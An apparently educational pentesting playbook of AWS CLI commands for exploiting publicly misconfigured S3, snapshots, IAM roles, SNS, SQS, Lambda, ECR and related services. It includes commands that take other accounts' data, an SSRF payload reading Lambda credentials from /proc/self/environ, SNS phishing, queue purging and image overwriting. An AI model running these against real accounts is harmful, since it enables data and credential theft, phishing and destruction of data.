Skip to content

Article by Eduard Agavriloae

Exploiting Public AWS Resources - CLI Attack Playbook

  • Tools mentioned in this article


    CloudShovel: A tool for scanning public or private AMIs for sensitive files and secrets

    coldsnap: A command line interface for Amazon EBS snapshots

This playbook shows how to exploit AWS resources that can be misconfigured to be publicly accessible. Think of it as a glossary of quick exploitation techniques that can be performed programmatically.

All attacks are meant to be executed from an external environment where the attacker is ideally an administrator.

The document is split in two categories: 1. Services and resources that can be found from a black-box perspective with little to reasonable effort 2. Services and resources that require information that can't be obtained through enumeration or brute-force

1. Can be found from black-box perspective

These services might be found from Awseye, Google Dorking, enumeration, searchable via AWS account ID and other sane methods.

S3 Buckets

Public List, Read and Write

Misconfiguration:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "PublicReadWrite",
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "s3:ListBucket",
                "s3:GetObject",
                "s3:PutObject"
            ],
            "Resource": [
                "arn:aws:s3:::example-bucket",
                "arn:aws:s3:::example-bucket/*"
            ]
        }
    ]
}
bucket_name="example-bucket"
region="region"

# List bucket contents via HTTP
curl https://$bucket_name.s3.$region.amazonaws.com/

# List bucket contents via CLI unauthenticated
# --no-sign-request will perform the API call unauthenticated
aws --no-sign-request s3 ls s3://$bucket_name

# List all objects including in subfolders unauthenticated
aws --no-sign-request s3api list-objects-v2 --bucket $bucket_name

file_name="target-file"

# Download file from bucket unauthenticated
aws --no-sign-request s3 cp s3://$bucket/$file_name .

# Upload file unauthenticated
# Files with same name are overwritten
echo "hackingthe.cloud" > $file_name.new
aws --no-sign-request s3 cp $file_name.new s3://$bucket/

Authenticated List and Write

Misconfiguration: - ACL misconfigured at object level so that only authenticated identities can access the file

bucket_name="example-bucket"
region="region"

# This will not work anymore
curl https://$bucket_name.s3.$region.amazonaws.com/

# List bucket contents via authenticated CLI
aws s3 ls s3://$bucket_name

S3 Static Website List Unauthenticated

Misconfiguration: - Static website allowing bucket to be listed

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "PublicReadGetIndex",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": [
                "s3:ListBucket",
                "s3:GetObject"
            ],
            "Resource": [
                "arn:aws:s3:::example-bucket",
                "arn:aws:s3:::example-bucket/*"
            ]
        }
    ]
}
bucket_name="example-bucket"
region="region"

# This will return the index.html
curl https://$bucket_name.s3-website.$region.amazonaws.com

# Removing the '-website' from the URL will list the files
# This works because the bucket is misconfigured
curl https://$bucket_name.s3.$region.amazonaws.com

# List bucket contents via CLI authenticated or unauthenticated
aws s3 ls s3://$bucket_name

AMIs

# Find the target AMI
# Mention '--include-deprecated' to make sure you get all results
# You'll have to search across every region since AMI is region dependent

# Search by owner account
aws --region $region ec2 describe-images --owner 123456789012 --include-deprecated

# Search by description or title
aws ec2 describe-images --filter Name="description",Values="*hackingthe.cloud*" --include-deprecated
aws ec2 describe-images --filter Name="name",Values="*hackingthe.cloud*" --include-deprecated

# Automatically scan the AMI with cloudshovel
# --bucket will specify where to save the files
# This will not work if multiple cloudshovel is executed
# multiple times in the same environment
cloudshovel --region $region --bucket example-bucket ami-example1234567890

# Manual approach
# Start an EC2 instance based on the target AMI and save
# the instance ID returned
# Create a security group that allows all inbound traffic if
# you don't already have one and use it here
# If the command fails then you might have to use another instance-type like c5.large
# You can specify '--no-associate-public-ip-address' if you don't want the instance
# to have a public IP, but you'll need a VPC Endpoint to connect to it via
# ec2-isntance-connect
aws ec2 run-instances --security-group-ids sg-example1234567890 --instance-type t2.micro --image-id ami-example1234567890 

# Try to connect to it using EC2 Instance Connect. The instance
aws ec2-instance-connect ssh --os-user root --instance-id i-example1234567890
# Search for files and secrets once connected
# If the command fails then most likely you'll have to 
# use the different method to access the AMI
# 1. You can use cloudshovel
# 2. Make an EBS Snapshot of the volume(s) and download them with coldsnap

# When you're done you can terminate the instance
aws ec2 terminate-instances --instance-ids $instance_id

EBS Snapshots

region=region

# Search by AWS account ID
aws ec2 describe-snapshots --owner-ids 123456789012

# Search by description
aws ec2 describe-snapshots --filter "Name=description,Values=*hackingthe.cloud*"

# Create volume from snapshot
# The availability zone must be the same as the instance we 
# will create shortly in order to attach the new volume there
aws ec2 create-volume --availability-zone $region'a' --snapshot-id snap-example1234567890

# Alternatively you can try to copy the Snapshot and
# operate with ti from there
# aws ec2 copy-snapshot --source-snapshot-id snap-example1234567890 --source-region $region

# Check if status is 'ok'
# Volume id is from the 'create-volume' API call
aws ec2 describe-volume-status --volume-id $volume_id

# Start a new EC2 instance in the same Availability Zone
# The Image Id is for an Amazon Linux image and has
# nothing to do with the public AMI from the previous section
# Create a security group that allows all inbound traffic if
# you don't already have one and use it here
aws ec2 run-instances --security-group-ids sg-example1234567890 --instance-type t2.micro --placement AvailabilityZone=$region'a' --image-id ami-example1234567890

# Attach volume to your instance and specify as device
# anything from /dev/sdf to /dev/sdp (you can use /dev/sdf)
# --instance-id is from 'run-instances' API call
aws ec2 attach-volume --volume-id $volume_id --instance-id $instance_id --device /dev/sdf

# Connect to the instance
aws ec2-instance-connect ssh --os-user root --instance-id $instance_id
# Mount the volume
# lsblk
# mount /dev/sdf1 /mnt
# Search the volume for files and secrets 

# Terminate the instance when you're done
aws ec2 terminate-instances --instance-ids $instance_id

# Delete the volume created
aws ec2 delete-volume --volume-id $volume_id

RDS Snapshots

# Depending on the engine of the target snapshot, you'll have to install
# the tool for connecting to the RDS server
# We'll use MySQL in this example 

# Search based on AWS account id using jq
# because there is no native way to do this
# Copy the DBSnapshotIdentifier
aws rds describe-db-snapshots --include-public | jq '.DBSnapshots[] | select(.DBSnapshotArn | contains("123456789012:"))'

# Restore Snapshot
# Use the DBSnapshotIdentifier from above and create
# a security group that allows all inbound traffic if
# you don't already have one and use it here
# $db_instance_identifier should be a new custom name for
# the new db 
aws rds restore-db-instance-from-db-snapshot --db-instance-identifier $db_instance_identifier \
    --db-snapshot-identifier $db_snapshot_identifier \
    --vpc-security-group-ids sg-example1234567890 --publicly-accessible --no-multi-az

# This will take around 5-15 minutes so you can run this
# command to know when the database was restored
# The DB Instance Identifier should be the same, but you
# can get it from the output of the previous command
aws rds wait db-instance-available --db-instance-identifier $db_instance_identifier

# Change login password
# In the response you will also see the RDS
# endpoint address. Copy that for connecting
# to the instance. The username for login can
# be found in the same response under "MasterUsername"
aws rds modify-db-instance \
    --db-instance-identifier $db_instance_identifier \
    --master-user-password MyNewPassword123! \
    --apply-immediately

# Connect to the database
mysql -h $url_db -u $username --skip-ssl -p
# show databases;
# use $database;
# show tables;

# Delete RDS instance
aws rds delete-db-instance --db-instance-identifier $db_identifier --skip-final-snapshot

IAM Roles

There are roles that can be assumed using various 3rd-party technologies if the role's trust policy is misconfigured.

Documented attacks on bad OIDC configurations: - GitHub - Terraform Cloud - GitLab

While the OIDC misconfigurations can be exploited from the internet, the attacks are more complex than what this document aims to help with. Please reefer to the original or related articles around the aforementioned attacks.

# Assuming a public role
role_name=example-role
# Try to assume role
aws sts assume-role \
    --role-arn arn:aws:iam::123456789012:role/$role_name \
    --role-session-name any-name

# Configure returned credentials
aws --profile any-name configure set aws_access_key_id $access_key_id
aws --profile any-name configure set aws_secret_access_key $secret_access_key
aws --profile any-name configure set aws_session_token $session_token

# Validate credentials
aws --profile any-name sts get-caller-identity

SSM Documents

# Search by name prefix
aws ssm list-documents --filters "Key=Owner,Values=Public" "Key=Name,Values=hackingthe.cloud"

# Search by owner with jq
# Takes 15-30 seconds to execute
# Copy the value from the "Name" field
aws ssm list-documents --filters "Key=Owner,Values=Public" | jq '.DocumentIdentifiers[] | select(.Owner | contains("123456789012"))'

# List document versions
# Different versions can have different
# secrets or details
aws list-document-versions --name $document_name

# Get document details
# If the document has more versions you can use --document-version $number
# to get details about that version
# If version is not specified then the default one is used
aws ssm describe-document --name $document_name

# Get the actual content of the document
# Use --document-version $number if multiple versions
aws ssm get-document --name $document_name

CloudFront

If the CloudFront distribution has as origin a misconfigured S3 bucket, then even if the bucket is configured to block public access, it might be possible to list the bucket by accessing the distribution's URL. In order for this to work the bucket policy needs to allow "s3:ListBucket" for the CloudFront's Origin Access Identity (OAI). Most likely you will not encounter this outside a lab.

# Try to list the bucket (Should not work)
# You won't know the bucket if you only have the distribution's URL
aws s3 ls s3://example-bucket

# Access the distribution and list the files
curl https://example1234567.cloudfront.net

# Read sensitive files
curl https://example1234567.cloudfront.net/$file

2. Can't be found from a black-box perspective

These services can't be identified from a purely black-box perspective (exception the Public ECR), but they can be misconfigured so that they can be accessed from any external AWS account. For most of these services you need additional information that most likely you'll not find from the internet, brute-forcing or similar techniques.

SNS Topics

# List topic subscribers
# This will return the subscribers which can be
# email addresses or other services like SQS queues
# that might be public as well
aws sns list-subscriptions-by-topic --topic-arn arn:aws:sns:$region:123456789012:example-topic

# Get topic attributes
aws sns get-topic-attributes --topic-arn arn:aws:sns:$region:123456789012:example-topic

# Subscribe to the topic
# If you subscribe you will get a confirmation
# email with a link you have to access
# After confirming you will receive any messages sent
# to the topic
aws sns subscribe --topic-arn arn:aws:sns:$region:123456789012:example-topic \
        --protocol email \
        --notification-endpoint $email_address


# Publish to topic
# All subscribers will receive this message
# This can be leveraged to perform phishing attacks
aws sns publish --topic-arn arn:aws:sns:$region:123456789012:example-topic --message "This is the email body" --subject "This is the email subject"

SQS Queues

# Send message
aws sqs send-message \
    --queue-url https://sqs.$region.amazonaws.com/123456789012/example-queue \
    --message-body "Your message"

# Receive messages
# This will remove the message from the queue
aws sqs receive-message --queue-url https://sqs.$region.amazonaws.com/123456789012/example-queue

# Delete message
# Message will be deleted anyway when
# running receive-message in default implementations
aws sqs delete-message \
    --queue-url https://sqs.$region.amazonaws.com/123456789012/example-queue \
    --receipt-handle $big_string_from_receive_message_call

# This will delete all items in the queue
aws sqs purge-queue --queue-url https://sqs.$region.amazonaws.com/123456789012/example-queue

Private API Gateways

A private API Gateway is private in the sens that it can't be accessed from outside the AWS's network. People can mistake a private API Gateway as being accessible only from their AWS account, which is a common misconception.

# Example API Gateway details
api_id=example123
region=eu-central-1
stage=prod
endpoint=fetch

# Try to access the API gateway from your host/VM
# It should not work
curl https://$api_id.execute-api.$region.amazonaws.com/$stage/$endpoint
nslookup $api_id.execute-api.$region.amazonaws.com

# We'll start an EC2 instance and perform the # request from there
# The instance must be in the same region as the target API
# Create a security group that allows all inbound traffic if
# you don't already have one and use it here
# The AMI is for the latest Amazon Linux image at the moment of writing this article
# Save the instance ID for later
aws --region $region ec2 run-instances --security-group-ids sg-example1234567 --instance-type t2.micro --image-id ami-0b5673b5f6e8f7fa7

# Check if you have VPC endpoint com.amazonaws.$region.execute-api
aws --region $region ec2 describe-vpc-endpoints

# Skip this if the VPC endpoint already exist
# Create the VPC Endpoint
# Should take around 1-2 minutes to be available
# Run either 'aws ec2 describe-instances' or
# 'aws ec2 describe-vpcs' or 'aws-describe-subnets' in order
# to get the information about the VPC id along with the subnet ids
# You have to use the same VPC as the one of the previous EC2
# Create a security group that allows all inbound traffic if
# you don't already have one and use it here
aws ec2 create-vpc-endpoint \
    --vpc-id vpc-example1234567 \
    --vpc-endpoint-type Interface \
    --service-name com.amazonaws.$region.execute-api \
    --subnet-ids subnet-example1234567,subnet-example1234567,subnet-example1234567 \
    --security-group-ids sg-example1234567 \
    --private-dns-enabled

# Connect to the instance
aws ec2-instance-connect ssh --os-user root --instance-id $instance_id
# Now we should be able to resolve and invoke the private API Gateway
# Check DNS resolution
nslookup $api_id.execute-api.$region.amazonaws.com

# Invoke the API
curl https://$api_id.execute-api.$region.amazonaws.com/$stage/$endpoint

Delete the instance and the VPC Endpoint when you're done. VPC Endpoints can get expensive.

Lambda Functions

function_name=example-function
# Invoke function via AWS CLI
# Because the function is from an external account, the
# whole ARN must be specified
# You can invoke a certain version of the function by adding its number at the end
# e.g. arn:aws:lambda:$region:123456789012:function:$function_name:1
aws lambda invoke --function-name arn:aws:lambda:$region:123456789012:function:$function_name \
    --payload '<input>'

# If the function is vulnerable to SSRF you might
# be able to exfiltrate the access credentials by reading
# the contents of /proc/self/environ
# For this you need to specify --cli-binary-format
# This is can be used as a persistence technique
aws lambda invoke --function-name arn:aws:lambda:$region:123456789012:function:$function_name \
    --payload '{"queryStringParameters":{"url":"file:///proc/self/environ"}}' \                                               
    --cli-binary-format raw-in-base64-out output.txt

# Invoke the function by its URL
# Just because the Lambda Function can be invoked
# by anyone, doesn't mean it will have a public URL
# There is no known way to reverse the function URL
# to get the function ARN or vice-versa
curl https://examplexample12345678901234567890exa.lambda-url.$region.on.aws/?url=file:///proc/self/environ > output.txt

ECR Repositories

Private Repository Access

Even if the repository is private, it can be misconfigured so that it allows any other AWS account to access it.

# Login first
# This command might not work on Windows
aws ecr get-login-password | docker login \
    --username AWS \
    --password-stdin 123456789012.dkr.ecr.$region.amazonaws.com/example-private

# Pull image
docker pull 123456789012.dkr.ecr.$region.amazonaws.com/example-private:latest

# Inspect image for secrets
# You can search the image in multiple ways
docker history 123456789012.dkr.ecr.$region.amazonaws.com/example-private:latest --no-trunc
docker inspect 123456789012.dkr.ecr.$region.amazonaws.com/example-private:latest
docker run -it 123456789012.dkr.ecr.$region.amazonaws.com/example-private:latest cat /etc/environment

# You can even push a new version of the image
# if the ECR is that badly misconfigured
docker push 123456789012.dkr.ecr.$region.amazonaws.com/example-private:latest

Public Repository Access

This is the case where the company created a public repository instead of a private one. Compared with the other services from section 3, this one can be found from a black-box perspective.

# You can find the repository by searching it
# https://gallery.ecr.aws/search?searchTerm=hackingthe.cloud

# Login
# The public ECR is available only in us-east-1
aws ecr-public get-login-password --region us-east-1 | docker login \
    --username AWS \
    --password-stdin public.ecr.aws/id123456/example-public


# Pull public image
docker pull public.ecr.aws/id123456/example-public

# Inspect image for secrets
# You can search the image in multiple ways
docker history public.ecr.aws/id123456/example-public --no-trunc
docker inspect public.ecr.aws/id123456/example-public
docker run -it 1public.ecr.aws/id123456/example-public cat /etc/environment

Call for contributions

Do you know other relevant services that can be misconfigured so that they grant read, write or execute permissions over their resources? Feel free to add or suggest them.

One service that should be included in this document is AWS Cognito. However, recently AWS performed some changes over how Cognito can be configured and further analysis is required before I can vouch for the attacks against it.